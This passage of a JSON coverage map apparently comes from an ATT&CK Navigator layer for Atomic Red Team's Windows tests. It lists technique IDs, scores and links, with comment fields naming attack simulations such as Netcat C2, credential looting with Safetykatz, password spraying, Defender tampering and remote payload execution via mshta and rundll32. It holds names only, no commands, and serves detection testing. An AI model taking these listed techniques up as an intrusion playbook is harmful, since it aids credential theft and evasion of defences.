Windows\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.008/T1070.008.md"}]},{"techniqueID":"T1071","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071/T1071.md"}]},{"techniqueID":"T1071.001","score":2,"enabled":true,"comment":"\n- Malicious User Agents - Powershell\n- Malicious User Agents - CMD\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"}]},{"techniqueID":"T1071.004","score":4,"enabled":true,"comment":"\n- DNS Large Query Volume\n- DNS Regular Beaconing\n- DNS Long Domain Query\n- DNS C2\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"}]},{"techniqueID":"T1072","score":2,"enabled":true,"comment":"\n- Radmin Viewer Utility\n- PDQ Deploy RAT\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1072/T1072.md"}]},{"techniqueID":"T1074","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074/T1074.md"}]},{"techniqueID":"T1074.001","score":2,"enabled":true,"comment":"\n- Stage data from Discovery.bat\n- Zip a Folder with PowerShell for Staging in Temp\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"}]},{"techniqueID":"T1078","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078/T1078.md"}]},{"techniqueID":"T1078.001","score":2,"enabled":true,"comment":"\n- Enable Guest account with RDP capability and admin privileges\n- Activate Guest Account\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"}]},{"techniqueID":"T1078.003","score":3,"enabled":true,"comment":"\n- Create local account with admin privileges\n- WinPwn - Loot local Credentials - powerhell kittie\n- WinPwn - Loot local Credentials - Safetykatz\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"}]},{"techniqueID":"T1082","score":20,"enabled":true,"comment":"\n- System Information Discovery\n- Hostname Discovery (Windows)\n- Windows MachineGUID Discovery\n- Griffon Recon\n- Environment variables discovery on windows\n- WinPwn - winPEAS\n- WinPwn - itm4nprivesc\n- WinPwn - Powersploits privesc checks\n- WinPwn - General privesc checks\n- WinPwn - GeneralRecon\n- WinPwn - Morerecon\n- WinPwn - RBCD-Check\n- WinPwn - PowerSharpPack - Watson searching for missing windows patches\n- WinPwn - PowerSharpPack - Sharpup checking common Privesc vectors\n- WinPwn - PowerSharpPack - Seatbelt\n- System Information Discovery with WMIC\n- Driver Enumeration using DriverQuery\n- System Information Discovery\n- Check computer location\n- BIOS Information Discovery through Registry\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"}]},{"techniqueID":"T1083","score":4,"enabled":true,"comment":"\n- File and Directory Discovery (cmd.exe)\n- File and Directory Discovery (PowerShell)\n- Simulating MAZE Directory Enumeration\n- Launch DirLister Executable\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"}]},{"techniqueID":"T1087","score":25,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087/T1087.md"}]},{"techniqueID":"T1087.001","score":3,"enabled":true,"comment":"\n- Enumerate all accounts on Windows (Local)\n- Enumerate all accounts via PowerShell (Local)\n- Enumerate logged on users via CMD (Local)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"}]},{"techniqueID":"T1087.002","score":22,"enabled":true,"comment":"\n- Enumerate all accounts (Domain)\n- Enumerate all accounts via PowerShell (Domain)\n- Enumerate logged on users via CMD (Domain)\n- Automated AD Recon (ADRecon)\n- Adfind -Listing password policy\n- Adfind - Enumerate Active Directory Admins\n- Adfind - Enumerate Active Directory User Objects\n- Adfind - Enumerate Active Directory Exchange AD Objects\n- Enumerate Default Domain Admin Details (Domain)\n- Enumerate Active Directory for Unconstrained Delegation\n- Get-DomainUser with PowerView\n- Enumerate Active Directory Users with ADSISearcher\n- Enumerate Linked Policies In ADSISearcher Discovery\n- Enumerate Root Domain linked policies Discovery\n- WinPwn - generaldomaininfo\n- Kerbrute - userenum\n- Wevtutil - Discover NTLM Users Remote\n- Suspicious LAPS Attributes Query with Get-ADComputer all properties\n- Suspicious LAPS Attributes Query with Get-ADComputer ms-Mcs-AdmPwd property\n- Suspicious LAPS Attributes Query with Get-ADComputer all properties and SearchScope\n- Suspicious LAPS Attributes Query with adfind all properties\n- Suspicious LAPS Attributes Query with adfind ms-Mcs-AdmPwd\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"}]},{"techniqueID":"T1090","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090/T1090.md"}]},{"techniqueID":"T1090.001","score":1,"enabled":true,"comment":"\n- portproxy reg key\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"}]},{"techniqueID":"T1090.003","score":2,"enabled":true,"comment":"\n- Psiphon\n- Tor Proxy Usage - Windows\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.003/T1090.003.md"}]},{"techniqueID":"T1091","score":1,"enabled":true,"comment":"\n- USB Malware Spread Simulation\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1091/T1091.md"}]},{"techniqueID":"T1095","score":3,"enabled":true,"comment":"\n- ICMP C2\n- Netcat C2\n- Powercat C2\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1095/T1095.md"}]},{"techniqueID":"T1098","score":10,"enabled":true,"comment":"\n- Admin Account Manipulate\n- Domain Account and Group Manipulate\n- Password Change on Directory Service Restore Mode (DSRM) Account\n- Domain Password Policy Check: Short Password\n- Domain Password Policy Check: No Number in Password\n- Domain Password Policy Check: No Special Character in Password\n- Domain Password Policy Check: No Uppercase Character in Password\n- Domain Password Policy Check: No Lowercase Character in Password\n- Domain Password Policy Check: Only Two Character Classes\n- Domain Password Policy Check: Common Password Use\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1105","score":21,"enabled":true,"comment":"\n- certutil download (urlcache)\n- certutil download (verifyctl)\n- Windows - BITSAdmin BITS Download\n- Windows - PowerShell Download\n- OSTAP Worming Activity\n- svchost writing a file to a UNC path\n- Download a File with Windows Defender MpCmdRun.exe\n- File Download via PowerShell\n- File download with finger.exe on Windows\n- Download a file with IMEWDBLD.exe\n- Curl Download File\n- Curl Upload File\n- Download a file with Microsoft Connection Manager Auto-Download\n- MAZE Propagation Script\n- Printer Migration Command-Line Tool UNC share folder into a zip file\n- Lolbas replace.exe use to copy file\n- Lolbas replace.exe use to copy UNC file\n- certreq download\n- Download a file using wscript\n- Nimgrab - Transfer Files\n- iwr or Invoke Web-Request download\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"}]},{"techniqueID":"T1106","score":5,"enabled":true,"comment":"\n- Execution through API - CreateProcess\n- WinPwn - Get SYSTEM shell - Pop System Shell using CreateProcess technique\n- WinPwn - Get SYSTEM shell - Bind System Shell using CreateProcess technique\n- WinPwn - Get SYSTEM shell - Pop System Shell using NamedPipe Impersonation technique\n- Run Shellcode via Syscall in Go\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1106/T1106.md"}]},{"techniqueID":"T1110","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110/T1110.md"}]},{"techniqueID":"T1110.001","score":3,"enabled":true,"comment":"\n- Brute Force Credentials of single Active Directory domain users via SMB\n- Brute Force Credentials of single Active Directory domain user via LDAP against domain controller (NTLM or Kerberos)\n- Password Brute User using Kerbrute Tool\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"}]},{"techniqueID":"T1110.002","score":1,"enabled":true,"comment":"\n- Password Cracking with Hashcat\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.002/T1110.002.md"}]},{"techniqueID":"T1110.003","score":6,"enabled":true,"comment":"\n- Password Spray all Domain Users\n- Password Spray (DomainPasswordSpray)\n- Password spray all Active Directory domain users with a single password via LDAP against domain controller (NTLM or Kerberos)\n- WinPwn - DomainPasswordSpray Attacks\n- Password Spray Invoke-DomainPasswordSpray Light\n- Password Spray using Kerbrute Tool\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1110.004","score":1,"enabled":true,"comment":"\n- Brute Force:Credential Stuffing using Kerbrute Tool\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"}]},{"techniqueID":"T1112","score":68,"enabled":true,"comment":"\n- Modify Registry of Current User Profile - cmd\n- Modify Registry of Local Machine - cmd\n- Modify registry to store logon credentials\n- Add domain to Trusted sites Zone\n- Javascript in registry\n- Change Powershell Execution Policy to Bypass\n- BlackByte Ransomware Registry Changes - CMD\n- BlackByte Ransomware Registry Changes - Powershell\n- Disable Windows Registry Tool\n- Disable Windows CMD application\n- Disable Windows Task Manager application\n- Disable Windows Notification Center\n- Disable Windows Shutdown Button\n- Disable Windows LogOff Button\n- Disable Windows Change Password Feature\n- Disable Windows Lock Workstation Feature\n- Activate Windows NoDesktop Group Policy Feature\n- Activate Windows NoRun Group Policy Feature\n- Activate Windows NoFind Group Policy Feature\n- Activate Windows NoControlPanel Group Policy Feature\n- Activate Windows NoFileMenu Group Policy Feature\n- Activate Windows NoClose Group Policy Feature\n- Activate Windows NoSetTaskbar Group Policy Feature\n- Activate Windows NoTrayContextMenu Group Policy Feature\n- Activate Windows NoPropertiesMyDocuments Group Policy Feature\n- Hide Windows Clock Group Policy Feature\n- Windows HideSCAHealth Group Policy Feature\n- Windows HideSCANetwork Group Policy Feature\n- Windows HideSCAPower Group Policy Feature\n- Windows HideSCAVolume Group Policy Feature\n- Windows Modify Show Compress Color And Info Tip Registry\n- Windows Powershell Logging Disabled\n- Windows Add Registry Value to Load Service in Safe Mode without Network\n- Windows Add Registry Value to Load Service in Safe Mode with Network\n- Disable Windows Toast Notifications\n- Disable Windows Security Center Notifications\n- Suppress Win Defender Notifications\n- Allow RDP Remote Assistance Feature\n- NetWire RAT Registry Key Creation\n- Ursnif Malware Registry Key Creation\n- Terminal Server Client Connection History Cleared\n- Disable Windows Error Reporting Settings\n- DisallowRun Execution Of Certain Applications\n- Enabling Restricted Admin Mode via Command_Prompt\n- Mimic Ransomware - Enable Multiple User Sessions\n- Mimic Ransomware - Allow Multiple RDP Sessions per User\n- Event Viewer Registry Modification - Redirection URL\n- Event Viewer Registry Modification - Redirection Program\n- Enabling Remote Desktop Protocol via Remote Registry\n- Disable Win Defender Notification\n- Disable Windows OS Auto Update\n- Disable Windows Auto Reboot for current logon user\n- Windows Auto Update Option to Notify before download\n- Do Not Connect To Win Update\n- Tamper Win Defender Protection\n- Snake Malware Registry Blob\n- Allow Simultaneous Download Registry\n- Modify Internet Zone Protocol Defaults in Current User Registry - cmd\n- Modify Internet Zone Protocol Defaults in Current User Registry - PowerShell\n- Activities To Disable Secondary Authentication Detected By Modified Registry Value.\n- Activities To Disable Microsoft [FIDO Aka Fast IDentity Online] Authentication Detected By Modified Registry Value.\n- Scarab Ransomware Defense Evasion Activities\n- Disable Remote Desktop Anti-Alias Setting Through Registry\n- Disable Remote Desktop Security Settings Through Registry\n- Disabling ShowUI Settings of Windows Error Reporting (WER)\n- Enable Proxy Settings\n- Set-Up Proxy Server\n- RDP Authentication Level Override\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1112/T1112.md"}]},{"techniqueID":"T1113","score":2,"enabled":true,"comment":"\n- Windows Screencapture\n- Windows Screen Capture (CopyFromScreen)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"}]},{"techniqueID":"T1114","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114/T1114.md"}]},{"techniqueID":"T1114.001","score":1,"enabled":true,"comment":"\n- Email Collection with PowerShell Get-Inbox\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md"}]},{"techniqueID":"T1115","score":3,"enabled":true,"comment":"\n- Utilize Clipboard to store or execute commands from\n- Execute Commands from Clipboard using PowerShell\n- Collect Clipboard Data via VBA\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"}]},{"techniqueID":"T1119","score":4,"enabled":true,"comment":"\n- Automated Collection Command Prompt\n- Automated Collection PowerShell\n- Recon information for export with PowerShell\n- Recon information for export with Command Prompt\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1119/T1119.md"}]},{"techniqueID":"T1120","score":2,"enabled":true,"comment":"\n- Win32_PnPEntity Hardware Inventory\n- WinPwn - printercheck\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1120/T1120.md"}]},{"techniqueID":"T1123","score":2,"enabled":true,"comment":"\n- using device audio capture commandlet\n- Registry artefact when application use microphone\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1123/T1123.md"}]},{"techniqueID":"T1124","score":4,"enabled":true,"comment":"\n- System Time Discovery\n- System Time Discovery - PowerShell\n- System Time Discovery W32tm as a Delay\n- System Time with Windows time Command\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1124/T1124.md"}]},{"techniqueID":"T1125","score":1,"enabled":true,"comment":"\n- Registry artefact when application use webcam\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1125/T1125.md"}]},{"techniqueID":"T1127","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127/T1127.md"}],"comment":"\n- Lolbin Jsc.exe compile javascript to exe\n- Lolbin Jsc.exe compile javascript to dll\n"},{"techniqueID":"T1127.001","score":2,"enabled":true,"comment":"\n- MSBuild Bypass Using Inline Tasks (C#)\n- MSBuild Bypass Using Inline Tasks (VB)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"}]},{"techniqueID":"T1129","score":1,"enabled":true,"comment":"\n- ESXi - Install a custom VIB on an ESXi host\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1129/T1129.md"}]},{"techniqueID":"T1132","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132/T1132.md"}]},{"techniqueID":"T1132.001","score":1,"enabled":true,"comment":"\n- XOR Encoded data.\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"}]},{"techniqueID":"T1133","score":1,"enabled":true,"comment":"\n- Running Chrome VPN Extensions via the Registry 2 vpn extension\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1133/T1133.md"}]},{"techniqueID":"T1134","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134/T1134.md"}]},{"techniqueID":"T1134.001","score":4,"enabled":true,"comment":"\n- Named pipe client impersonation\n- `SeDebugPrivilege` token duplication\n- Launch NSudo Executable\n- Bad Potato\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/T1134.001.md"}]},{"techniqueID":"T1134.002","score":2,"enabled":true,"comment":"\n- Access Token Manipulation\n- WinPwn - Get SYSTEM shell - Pop System Shell using Token Manipulation technique\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.002/T1134.002.md"}]},{"techniqueID":"T1134.004","score":5,"enabled":true,"comment":"\n- Parent PID Spoofing using PowerShell\n- Parent PID Spoofing - Spawn from Current Process\n- Parent PID Spoofing - Spawn from Specified Process\n- Parent PID Spoofing - Spawn from svchost.exe\n- Parent PID Spoofing - Spawn from New Process\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.004/T1134.004.md"}]},{"techniqueID":"T1134.005","score":1,"enabled":true,"comment":"\n- Injection SID-History with mimikatz\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.005/T1134.005.md"}]},{"techniqueID":"T1135","score":7,"enabled":true,"comment":"\n- Network Share Discovery command prompt\n- Network Share Discovery PowerShell\n- View available share drives\n- Share Discovery with PowerView\n- PowerView ShareFinder\n- WinPwn - shareenumeration\n- Network Share Discovery via dir command\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"}]},{"techniqueID":"T1136","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136/T1136.md"}]},{"techniqueID":"T1136.001","score":4,"enabled":true,"comment":"\n- Create a new user in a command prompt\n- Create a new user in PowerShell\n- Create a new Windows admin user\n- Create a new Windows admin user via .NET\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"}]},{"techniqueID":"T1136.002","score":3,"enabled":true,"comment":"\n- Create a new Windows domain admin user\n- Create a new account similar to ANONYMOUS LOGON\n- Create a new Domain Account using PowerShell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"}]},{"techniqueID":"T1137","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137/T1137.md"}],"comment":"\n- Office Application Startup - Outlook as a C2\n"},{"techniqueID":"T1137.002","score":1,"enabled":true,"comment":"\n- Office Application Startup Test Persistence (HKCU)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.002/T1137.002.md"}]},{"techniqueID":"T1137.004","score":1,"enabled":true,"comment":"\n- Install Outlook Home Page Persistence\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md"}]},{"techniqueID":"T1137.006","score":5,"enabled":true,"comment":"\n- Code Executed Via Excel Add-in File (XLL)\n- Persistent Code Execution Via Excel Add-in File (XLL)\n- Persistent Code Execution Via Word Add-in File (WLL)\n- Persistent Code Execution Via Excel VBA Add-in File (XLAM)\n- Persistent Code Execution Via PowerPoint VBA Add-in File (PPAM)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.006/T1137.006.md"}]},{"techniqueID":"T1140","score":2,"enabled":true,"comment":"\n- Deobfuscate/Decode Files Or Information\n- Certutil Rename and Decode\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"}]},{"techniqueID":"T1176","score":5,"enabled":true,"comment":"\n- Chrome/Chromium (Developer Mode)\n- Chrome/Chromium (Chrome Web Store)\n- Firefox\n- Edge Chromium Addon - VPN\n- Google Chrome Load Unpacked Extension With Command Line\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"}]},{"techniqueID":"T1187","score":2,"enabled":true,"comment":"\n- PetitPotam\n- WinPwn - PowerSharpPack - Retrieving NTLM Hashes without Touching LSASS\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1187/T1187.md"}]},{"techniqueID":"T1195","score":1,"enabled":true,"comment":"\n- Octopus Scanner Malware Open Source Supply Chain\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1195/T1195.md"}]},{"techniqueID":"T1197","score":4,"enabled":true,"comment":"\n- Bitsadmin Download (cmd)\n- Bitsadmin Download (PowerShell)\n- Persist, Download, & Execute\n- Bits download using desktopimgdownldr.exe (cmd)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1197/T1197.md"}]},{"techniqueID":"T1201","score":5,"enabled":true,"comment":"\n- Examine local password policy - Windows\n- Examine domain password policy - Windows\n- Get-DomainPolicy with PowerView\n- Enumerate Active Directory Password Policy with get-addefaultdomainpasswordpolicy\n- Use of SecEdit.exe to export the local security policy (including the password policy)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"}]},{"techniqueID":"T1202","score":3,"enabled":true,"comment":"\n- Indirect Command Execution - pcalua.exe\n- Indirect Command Execution - forfiles.exe\n- Indirect Command Execution - conhost.exe\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1202/T1202.md"}]},{"techniqueID":"T1204","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204/T1204.md"}]},{"techniqueID":"T1204.002","score":11,"enabled":true,"comment":"\n- OSTap Style Macro Execution\n- OSTap Payload Download\n- Maldoc choice flags command execution\n- OSTAP JS version\n- Office launching .bat file from AppData\n- Excel 4 Macro\n- Headless Chrome code execution via VBA\n- Potentially Unwanted Applications (PUA)\n- Office Generic Payload Download\n- LNK Payload Download\n- Mirror Blast Emulation\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md"}]},{"techniqueID":"T1204.003","score":1,"enabled":true,"comment":"\n- Malicious Execution from Mounted ISO Image\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.003/T1204.003.md"}]},{"techniqueID":"T1207","score":1,"enabled":true,"comment":"\n- DCShadow (Active Directory)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1207/T1207.md"}]},{"techniqueID":"T1216","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216/T1216.md"}],"comment":"\n- SyncAppvPublishingServer Signed Script PowerShell Command Execution\n- manage-bde.wsf Signed Script Command Execution\n"},{"techniqueID":"T1216.001","score":1,"enabled":true,"comment":"\n- PubPrn.vbs Signed Script Bypass\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md"}]},{"techniqueID":"T1217","score":4,"enabled":true,"comment":"\n- List Google Chrome / Opera Bookmarks on Windows with powershell\n- List Google Chrome / Edge Chromium Bookmarks on Windows with command prompt\n- List Mozilla Firefox bookmarks on Windows with command prompt\n- List Internet Explorer Bookmarks using the command prompt\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"}]},{"techniqueID":"T1218","score":77,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/T1218.md"}],"comment":"\n- mavinject - Inject DLL into running process\n- Register-CimProvider - Execute evil dll\n- InfDefaultInstall.exe .inf Execution\n- ProtocolHandler.exe Downloaded a Suspicious File\n- Microsoft.Workflow.Compiler.exe Payload Execution\n- Renamed Microsoft.Workflow.Compiler.exe Payload Executions\n- Invoke-ATHRemoteFXvGPUDisablementCommand base test\n- DiskShadow Command Execution\n- Load Arbitrary DLL via Wuauclt (Windows Update Client)\n- Lolbin Gpscript logon option\n- Lolbin Gpscript startup option\n- Lolbas ie4uinit.exe use as proxy\n- LOLBAS CustomShellHost to Spawn Process\n- Provlaunch.exe Executes Arbitrary Command via Registry Key\n- LOLBAS Msedge to Spawn Process\n"},{"techniqueID":"T1218.001","score":8,"enabled":true,"comment":"\n- Compiled HTML Help Local Payload\n- Compiled HTML Help Remote Payload\n- Invoke CHM with default Shortcut Command Execution\n- Invoke CHM with InfoTech Storage Protocol Handler\n- Invoke CHM Simulate Double click\n- Invoke CHM with Script Engine and Help Topic\n- Invoke CHM Shortcut Command with ITS and Help Topic\n- Decompile Local CHM File\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md"}]},{"techniqueID":"T1218.002","score":1,"enabled":true,"comment":"\n- Control Panel Items\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md"}]},{"techniqueID":"T1218.003","score":2,"enabled":true,"comment":"\n- CMSTP Executing Remote Scriptlet\n- CMSTP Executing UAC Bypass\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/T1218.003.md"}]},{"techniqueID":"T1218.004","score":8,"enabled":true,"comment":"\n- CheckIfInstallable method call\n- InstallHelper method call\n- InstallUtil class constructor method call\n- InstallUtil Install method call\n- InstallUtil Uninstall method call - /U variant\n- InstallUtil Uninstall method call - '/installtype=notransaction /action=uninstall' variant\n- InstallUtil HelpText method call\n- InstallUtil evasive invocation\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md"}]},{"techniqueID":"T1218.005","score":10,"enabled":true,"comment":"\n- Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject\n- Mshta executes VBScript to execute malicious command\n- Mshta Executes Remote HTML Application (HTA)\n- Invoke HTML Application - Jscript Engine over Local UNC Simulating Lateral Movement\n- Invoke HTML Application - Jscript Engine Simulating Double Click\n- Invoke HTML Application - Direct download from URI\n- Invoke HTML Application - JScript Engine with Rundll32 and Inline Protocol Handler\n- Invoke HTML Application - JScript Engine with Inline Protocol Handler\n- Invoke HTML Application - Simulate Lateral Movement over UNC Path\n- Mshta used to Execute PowerShell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md"}]},{"techniqueID":"T1218.007","score":11,"enabled":true,"comment":"\n- Msiexec.exe - Execute Local MSI file with embedded JScript\n- Msiexec.exe - Execute Local MSI file with embedded VBScript\n- Msiexec.exe - Execute Local MSI file with an embedded DLL\n- Msiexec.exe - Execute Local MSI file with an embedded EXE\n- WMI Win32_Product Class - Execute Local MSI file with embedded JScript\n- WMI Win32_Product Class - Execute Local MSI file with embedded VBScript\n- WMI Win32_Product Class - Execute Local MSI file with an embedded DLL\n- WMI Win32_Product Class - Execute Local MSI file with an embedded EXE\n- Msiexec.exe - Execute the DllRegisterServer function of a DLL\n- Msiexec.exe - Execute the DllUnregisterServer function of a DLL\n- Msiexec.exe - Execute Remote MSI file\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md"}]},{"techniqueID":"T1218.008","score":2,"enabled":true,"comment":"\n- Odbcconf.exe - Execute Arbitrary DLL\n- Odbcconf.exe - Load Response File\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.008/T1218.008.md"}]},{"techniqueID":"T1218.009","score":2,"enabled":true,"comment":"\n- Regasm Uninstall Method Call Test\n- Regsvcs Uninstall Method Call Test\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md"}]},{"techniqueID":"T1218.010","score":5,"enabled":true,"comment":"\n- Regsvr32 local COM scriptlet execution\n- Regsvr32 remote COM scriptlet execution\n- Regsvr32 local DLL execution\n- Regsvr32 Registering Non DLL\n- Regsvr32 Silent DLL Install Call DllRegisterServer\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md"}]},{"techniqueID":"T1218.011","score":13,"enabled":true,"comment":"\n- Rundll32 execute JavaScript Remote Payload With GetObject\n- Rundll32 execute VBscript command\n- Rundll32 execute VBscript command using Ordinal number\n- Rundll32 advpack.dll Execution\n- Rundll32 ieadvpack.dll Execution\n- Rundll32 syssetup.dll Execution\n- Rundll32 setupapi.dll Execution\n- Execution of HTA and VBS Files using Rundll32 and URL.dll\n- Launches an executable using Rundll32 and pcwutl.dll\n- Execution of non-dll using rundll32.exe\n- Rundll32 with Ordinal Value\n- Rundll32 with Control_RunDLL\n- Rundll32 with desk.cpl\n","links":[{"label":"View 